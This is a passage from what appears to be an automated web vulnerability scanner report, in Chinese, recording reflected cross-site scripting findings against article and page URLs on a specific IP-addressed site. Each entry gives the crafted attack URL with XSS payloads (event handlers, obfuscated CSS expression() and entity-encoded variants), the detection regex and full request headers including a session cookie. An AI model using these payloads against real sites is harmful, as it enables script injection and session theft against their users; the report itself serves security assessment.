  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c18.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c18.mhtml?'%20onmouseover=dfbhmg(6669)%20
2、设置参数 '%20onmouseover=dfbhmg(6669)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6669)
请求&响应 GET /index.php/article/c18.mhtml?'%20onmouseover=dfbhmg(6669)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c18.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c18.mhtml?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6617))%20var=%20
2、设置参数 var'%20style=dfbhmg:expre/**/ssion(dfbhmg(6617))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6617))
请求&响应 GET /index.php/article/c18.mhtml?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6617))%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/23.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/23'%20style=dfbhmg:expre/**/ssion(dfbhmg(6071))%20var=%20.mhtml
2、设置参数 value0'%20style=dfbhmg:expre/**/ssion(dfbhmg(6071))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6071))
请求&响应 GET /index.php/article/23'%20style=dfbhmg:expre/**/ssion(dfbhmg(6071))%20var=%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/index.mhtml

URL http://202.201.39.48/index.php/article/c36/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36/p2.html?'%20onmouseover=dfbhmg(6744)%20
2、设置参数 '%20onmouseover=dfbhmg(6744)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6744)
请求&响应 GET /index.php/article/c36/p2.html?'%20onmouseover=dfbhmg(6744)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36/p2.html
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36/p2.html?var='%20onmouseover=%22dfbhmg(6042)%22%3e%20
2、设置参数 var'%20onmouseover=%22dfbhmg(6042)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6042)
请求&响应 GET /index.php/article/c36/p2.html?var='%20onmouseover=%22dfbhmg(6042)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36/p2.html/'%20onmouseover=dfbhmg(6350)%20var=%20
2、设置参数 '%20onmouseover=dfbhmg(6350)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6350)
请求&响应 GET /index.php/article/c36/p2.html/'%20onmouseover=dfbhmg(6350)%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36/p2.html;'%20style=dfbhmg:expre/**/ssion(dfbhmg(6974))%20var=%20
2、设置参数 '%20style=dfbhmg:expre/**/ssion(dfbhmg(6974))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6974))
请求&响应 GET /index.php/article/c36/p2.html;'%20style=dfbhmg:expre/**/ssion(dfbhmg(6974))%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36.mhtml?'%20onmouseover=%22dfbhmg(6441)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6441)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6441)
请求&响应 GET /index.php/article/c36.mhtml?'%20onmouseover=%22dfbhmg(6441)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36.mhtml?var='%20onmouseover=%22dfbhmg(6106)%22%3e%20
2、设置参数 var'%20onmouseover=%22dfbhmg(6106)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6106)
请求&响应 GET /index.php/article/c36.mhtml?var='%20onmouseover=%22dfbhmg(6106)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36/p2.html'%20onmouseover=dfbhmg(6563)%20
2、设置参数 '%20onmouseover=dfbhmg(6563)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6563)
请求&响应 GET /index.php/article/c36/p2.html'%20onmouseover=dfbhmg(6563)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36.mhtml/'%20onmouseover=dfbhmg(6773)%20
2、设置参数 '%20onmouseover=dfbhmg(6773)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6773)
请求&响应 GET /index.php/article/c36.mhtml/'%20onmouseover=dfbhmg(6773)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36.mhtml;'%20onmouseover=%22dfbhmg(6222)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6222)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6222)
请求&响应 GET /index.php/article/c36.mhtml;'%20onmouseover=%22dfbhmg(6222)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c36.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c36.mhtml'%20onmouseover=%22dfbhmg(6143)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6143)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6143)
请求&响应 GET /index.php/article/c36.mhtml'%20onmouseover=%22dfbhmg(6143)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c36.html

URL http://202.201.39.48/index.php/article/c22.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c22.mhtml?'%20onmouseover=%22dfbhmg(6536)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6536)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6536)
请求&响应 GET /index.php/article/c22.mhtml?'%20onmouseover=%22dfbhmg(6536)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c22.html

URL http://202.201.39.48/index.php/article/c22.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c22.mhtml?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6422))%20var=%20
2、设置参数 var'%20style=dfbhmg:expre/**/ssion(dfbhmg(6422))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6422))
请求&响应 GET /index.php/article/c22.mhtml?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6422))%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c22.html

URL http://202.201.39.48/index.php/article/c16.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c16.mhtml?'%20style=dfbhmg:expre/**/ssion(dfbhmg(6421))%20var=%20
2、设置参数 '%20style=dfbhmg:expre/**/ssion(dfbhmg(6421))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6421))
请求&响应 GET /index.php/article/c16.mhtml?'%20style=dfbhmg:expre/**/ssion(dfbhmg(6421))%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c16.html

URL http://202.201.39.48/index.php/article/c16.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c16.mhtml?var='%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x31;%26%23x39;%26%23x36;%26%23x29;%20
2、设置参数 var'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x31;%26%23x39;%26%23x36;%26%23x29;%20
3、在响应头及响应内容中匹配: onblur.*?dfbhmg(6196)
请求&响应 GET /index.php/article/c16.mhtml?var='%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x31;%26%23x39;%26%23x36;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c16.html

URL http://202.201.39.48/index.php/article/c19/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19/p2.html?'%20onmouseover=%22dfbhmg(6376)%22%3e%20var=%20
2、设置参数 '%20onmouseover=%22dfbhmg(6376)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6376)
请求&响应 GET /index.php/article/c19/p2.html?'%20onmouseover=%22dfbhmg(6376)%22%3e%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.html

URL http://202.201.39.48/index.php/article/c19/p2.html
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19/p2.html?var='%20onmouseover=%22dfbhmg(6477)%22%3e%20var=%20
2、设置参数 var'%20onmouseover=%22dfbhmg(6477)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6477)
请求&响应 GET /index.php/article/c19/p2.html?var='%20onmouseover=%22dfbhmg(6477)%22%3e%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.html

URL http://202.201.39.48/index.php/article/c19/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19/p2.html/'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x39;%26%23x38;%26%23x39;%26%23x29;%20
2、设置参数 '%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x39;%26%23x38;%26%23x39;%26%23x29;%20
3、在响应头及响应内容中匹配: onblur.*?dfbhmg(6989)
请求&响应 GET /index.php/article/c19/p2.html/'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x39;%26%23x38;%26%23x39;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.html

URL http://202.201.39.48/index.php/article/c19/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19/p2.html;'%20onmouseover=dfbhmg(6467)%20
2、设置参数 '%20onmouseover=dfbhmg(6467)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6467)
请求&响应 GET /index.php/article/c19/p2.html;'%20onmouseover=dfbhmg(6467)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.html

URL http://202.201.39.48/index.php/article/c19/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c19/p2.html'%20onmouseover=dfbhmg(6143)%20
2、设置参数 '%20onmouseover=dfbhmg(6143)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6143)
请求&响应 GET /index.php/article/c19/p2.html'%20onmouseover=dfbhmg(6143)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c19.html

URL http://202.201.39.48/index.php/page/17.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/page/"%20onmouseover=dfbhmg(6652)%20.mhtml
2、设置参数 value0"%20onmouseover=dfbhmg(6652)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6652)
请求&响应 GET /index.php/page/"%20onmouseover=dfbhmg(6652)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/page/17.html

URL http://202.201.39.48/index.php/article/c17/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17/p2.html?'%20onmouseover=dfbhmg(6741)%20
2、设置参数 '%20onmouseover=dfbhmg(6741)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6741)
请求&响应 GET /index.php/article/c17/p2.html?'%20onmouseover=dfbhmg(6741)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.html

URL http://202.201.39.48/index.php/article/c17/p2.html
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17/p2.html?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6384))%20var=%20
2、设置参数 var'%20style=dfbhmg:expre/**/ssion(dfbhmg(6384))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6384))
请求&响应 GET /index.php/article/c17/p2.html?var='%20style=dfbhmg:expre/**/ssion(dfbhmg(6384))%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.html

URL http://202.201.39.48/index.php/article/c17/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17/p2.html/'%20style=dfbhmg:expre/**/ssion(dfbhmg(6652))%20var=%20
2、设置参数 '%20style=dfbhmg:expre/**/ssion(dfbhmg(6652))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6652))
请求&响应 GET /index.php/article/c17/p2.html/'%20style=dfbhmg:expre/**/ssion(dfbhmg(6652))%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
